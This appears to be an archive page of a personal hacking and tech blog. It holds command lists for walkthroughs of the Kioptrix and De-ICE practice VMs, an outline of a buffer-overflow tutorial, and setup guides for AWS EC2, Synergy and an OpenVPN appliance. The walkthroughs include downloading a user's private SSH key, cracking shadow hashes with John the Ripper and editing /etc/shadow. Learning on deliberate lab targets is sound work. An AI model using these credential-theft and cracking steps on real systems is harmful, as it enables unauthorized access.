Kioptrix Level 1 – Samba
22 Feb2012
Tools used:
Ubuntu
nmap
Metasploit Framework
Music:
Samba Do Brasil – Ey Macalena
Commands Used:
nmap -sP 192.168.246.0/24
nmap -sV 192.168.246.130
msfconsole
whoami
cat
- In: General Hacking|Linux
Online Hacking/Programming Challenges
13 Jan2012
Just a short list. Please let me know of ones I am missing:
http://www.overthewire.org/wargames/
https://cybersecuritychallenge.org.uk/index.php
http://www.pythonchallenge.com/
- In: General Hacking
Break for Certification
12 Jan2012
I’m taking a one month break from Hacking related posts to study up for the Microsoft 70-640: Configuring Windows Server 2008 Active Directory exam. While Hacking is fun, work pays the bills.
- In: Technology
De-ICE 2.100
15 Nov2011
Tools used:
Backtrack 5
nmap
dirbuster
nikto
Music:
Hackers Soundtrack – Halycon On and On
Commands Used:
nmap -sn 192.168.2.0/24
nmap -sV 192.168.2.100
nmap -sV 192.168.2.101
firefox 192.168.2.100 &
lynx -dump http://192.168.2.100/index2.html > dump
cat dump |sed ‘s/[^@]* \([a-zA-Z0-9.]*@[^ ] *\).*/\1/’ > test
awk ‘{ printf “~”; print }’ test > users
dirbuster
./nikto -host 192.168.2.101 -root ~pirrip/ -Display 1
firefox 192.168.2.101/~pirrip/.ssh &
wget http://192.168.2.101/~pirrip/.ssh/id_rsa
wget http://192.168.2.101/~pirrip/.ssh/id_rsa.pub
ssh pirrip@192.168.2.100
mailx
password is 0l1v3rTw1st
sudo more /etc/sudoers
sudo vi /etc/shadow
cp great_expectations.zip /var/www/htdocs
chmod 777 great_expectations.zip
tar xvwf great
strings
- In: General Hacking|Linux
De-ICE 1.110 Level 1 Part 2
21 Oct2011
Tools used:
Backtrack 5
nmap
ftp
john the ripper
openssl
Music:
Marconi Union
Commands Used:
nmap -sP 192.168.1.0/24
nmap -sV 192.168.1.110
firefox 192.168.1.110 &
gedit names &
ftp 192.168.1.110
“login anonymous”
cd download/etc
get core
cat core
strings core > shadow
cd /pentest/password/john
./john –rules –wordlist=/pentest/password/wordlists/darc0de.lst /root/shadow
ssh bbanter@192.168.1.110
su
cd /root/.save
openssl enc -d -aes-256-cbc -salt -in customer_account.csv.enc -out customer.csv -pass file:/etc/ssl/certs/pw
- In: General Hacking|Linux
Exploit Development: From Fuzzing to BOF Part 1
16 Oct2011
In a multiple part blog post I will be taking a step by step approach to a Stack Based Buffer Overflow on a vulnerable application.
Part 1:
x86 Assembly Code Links
Video: Quick overview of Ollydbg, opening an exe, description of the frames & columns, Stepping, Assigning Breakpoints and triggering one.
What is fuzzing?
Part 2:
Using the spike fuzzer
Spike scripting, fuzzed protocol
Video: Fuzzing vulnerable application using Spike
Part 3:
Video: Show the vulnerability in action
Understanding Stack Overflows
Part 4:
Finding the offset
Finding a place for our code
Video: Redirecting execution to our code
Part 5:
Video: Adding shellcode to the exploit
Part 1:
This tutorial will be using a Windows XP VM. You will need 5 things for this walkthrough.
1. Some Version of Windows. XP works the best. If you use Vista or 7 you will have to adjust compatibility settings for the applications.
2. Vulnserver, the vulnerable application: Vulnserver
3. Ollydbg, 32bit assembly debugger: Ollydbg 1.10
4. Perl, I recommend ActiveState Perl: ActiveState Perl
5. Download the breakpoint perl script: Breakpoint.pl
Ollydbg Intro Video:
Explanation of terms used in the video:
- Step In, Step Out (F8): This allows you to walk through the code without following any calls or jumps to other sections. You can notice the changes to the stack and the registers as you step through
- CALL instructions redirect execution of the code to another part of memory
- Step into (F7): This will follow the executed code to the memory address instead of just stepping through it
- Breakpoints: Setting a breakpoint allows you to stop the execution of the code at a given point
- Instead of repeatedly pressing F8 or F7 over and over you can use animation. Use CTRL+F8 or CTRL+F7 to automate the process. Press ESC when you want to stop the animation.
- In: General Hacking
De-ICE 1.100 Level 1
10 Oct2011
De-ICE 1.100 Level 1:
There are a million videos for De-ICE but now there are a million and one. I wanted to make a video just to prove that I could and because no one would put this song to one of their videos. Just to make a point to g0tmi1k I don’t fix the broken ftp server at the end…..and I never will!
Amazon Cloud EC2 Free VPS Setup
8 Oct2011
First things first. When I say free I mean it’s free for a year. You will have to use the micro-instance, which is a 10gb HDD, 613mb ram and I quote
Up to 2 EC2 Compute Units (for short periodic bursts)
(Don’t ask me the mhz on that….) Its plenty fast enough for terminal use, VNC for a basic desktop, programming etc….
You will need a credit card and a cell phone. A visa gift card and a prepaid phone will work.
Lets sign up.
The signup process is pretty straight forward. They will call your cell phone to have you put in a pin number. If you do this wrong to many times you will be blocked from signing up for 24 hours. Once the sign up process is complete sign in and click the EC2 tab.
You may get pop ups that ask if you want to stop a script, click no, the AWS console can be a bit slow in loading.
Click ‘Launch Instance’
The instances with gold stars are the free micro tier instances and the ones you should pick unless you want to pay. You can also browse under ‘Community AMIs’ for other distributions. Lets pick the ‘Basic 32 bit Amazon Linux AMI’. Click Select.
You can only have 1 instance at a time for the free setup and it can only be a micro-instance. Click ‘Continue’.
Place a check in the ‘Termination Protection’. Terminating an instance deletes the instance completely. The protection basically stops you from accidentally deleting it. On the next screen name your instance and ‘Continue’
The ‘Key Pair’ is the only way you will be able to SSH into your instance at the start. You can change your sshd config later so you dont have to keep the key around. You cannot download this key again so make sure you save it somewhere safe on this screen. Create a new key pair and select ‘Continue’.
A ‘security group’ is essentially the firewall configuration. Choose the default one. It will already have the ports open for SSH.
Your new instances is now running and you can connect to it. For SSH connection instructions right click on your instance and select ‘Connect’. Make sure to change the password when you connect for the first time.
Notes:
Let me know if you have any trouble or need extra help.
- In: Linux|Technology
As a computer geek I found myself with a problem. I had multiple machines at my desk and had only 2 solutions. Either I get a KVM with more then 2 ports or have a second/third set of keyboards and mouses. The problem with the KVM was that I would only be able to see one computer screen at a time and you can figure out the issues with the extra keyboards.
So this is my work setup:
The three screens on the left are the laptop and 2 monitors connected to the laptop. The square monitor to the right is connected to another workstation under the desk that I use for VMs and testing. The problem was every time I wanted to use that VM machine i had to pull out the extra keyboard and mouse.
That was until a work colleague introduced me to: http://synergy-foss.org/
This program allows you to use the same keyboard and mouse across workstations just by moving the mouse across your screen like its just an additional monitor.
In this example I will be using a Windows machine and an Ubuntu machine.
1. Download and install the client on both platforms
2. The XP machine in this example will be the server (has the keyboard and mouse attached)
3. Start Synergy -> Click ‘Share this computer’s keyboard….’ and Press the configure button.
4. You will need to add a screen for the server and for the client machine.
5. The screen names need to be either the hostname of the machine or the IP. I use the hostname just incase the IP of the machine changes.
6. Next you need to set the links for each screen. This essentially says ‘If I move my mouse to the right of the Server screen it will move onto the Client screen’ If you have the Server monitor on the left and the client monitor on the right.
7. Thats it for the server XP machine. Go ahead and click ‘Start’ on the Synergy program.
8. Next we need to setup the Ubuntu client. I found that QuickSynergy is a great GUI frontend and the screenshots will reference it. Under the ‘Ubuntu Software Center’ search for ‘Synergy’ and install both options.
9. Open QuickSynergy and edit the ‘Use’ tab so that it contains the hostname/screen of the server and client.
10. Click ‘Execute’ and the Windows Synergy program should now show ‘UbuntuClient’ connected. Try moving the mouse across the screens and test typing.
I don’t know how I lived without this program before. Let me know if you have any questions.
- In: Technology
Installing OpenVPN Virtual Appliance
7 Oct2011
If you have ever struggled with the command line version of OpenVPN and wished there was an easier way, well there is. The virtual appliance is a preinstalled VMware image that has a web interface built in to manage your OpenVPN connections. It comes with 2 connection licenses for free. The install is quick and you can have a OpenVPN connection up in 5 minutes.
1. Download the appropriate client for your enviroment. I will be using the VMWare image.
2. The VMWare image can be used in anything from Player up to Workstation. Workstation 8 on Ubuntu will be used in this demo.
3. Unzip the client: unzip OpenVPN-AS-Appliance-1.6.1.zip
4. Go to your VMWare product and open the vmx file.
5. Power on the virtual machine. When prompted during boot press ‘Enter’ and do not type in DELETE
6. You will be present with a blue screen:
7. If you need to setup a static IP go to configure network. The default is for it to be on DHCP.
8. Lets select ‘Login’ and set two passwords. The initial username is ‘root’ and the default password is ‘openvpnas’
9. Once logged in go ahead and set a new root password by issuing the command ‘passwd’. Next we need to set a password for the user ‘openvpn’ by using the command ‘password openvpn’. There isn’t really anything more that needs to be done on this terminal. Go ahead and open a web browser on your local computer.
10. Go to the address: https://If you need to find your IP, log back into the terminal and type ‘ifconfig eth0′ After you enter this into the browser you should get the screen below:
11. The login name will be ‘openvpn’ and the password is the one you set in the terminal for that user.
12. Next you will see the regular user options. We will come back to this. Go ahead and click ‘Admin’ and log back in using the openvpn user. Agree to the license.
13. There are only a couple more things to change before you are ready to connect. Under ‘Server Network Settings’ change the hostname either to your domain name or the public WAN ip people will be connecting to.
14. This is a personal preference but under ‘Authentication – General’ I set it to ‘Local’. This allows you to add new users on the webpage without having to connect to the terminal. Its much easier to manage remotely this way.
15. Thats it! You should now be able to connect to your OpenVPN server. Go to the webpage https://and login. There is an automatically installed windows client or download the ‘Yourself (user-locked profile)’ to connect in Linux.
Notes:
- You will need to open ports in your firewall to allow access. 80, 443, and 1194.
- If you want access to a certain subnet on your network you set that under ‘VPN Settings – Routing’
- The linux client tends to throw a lot of errors but connects anyway and works fine.Let me know if you have any comments or questions
- In: Linux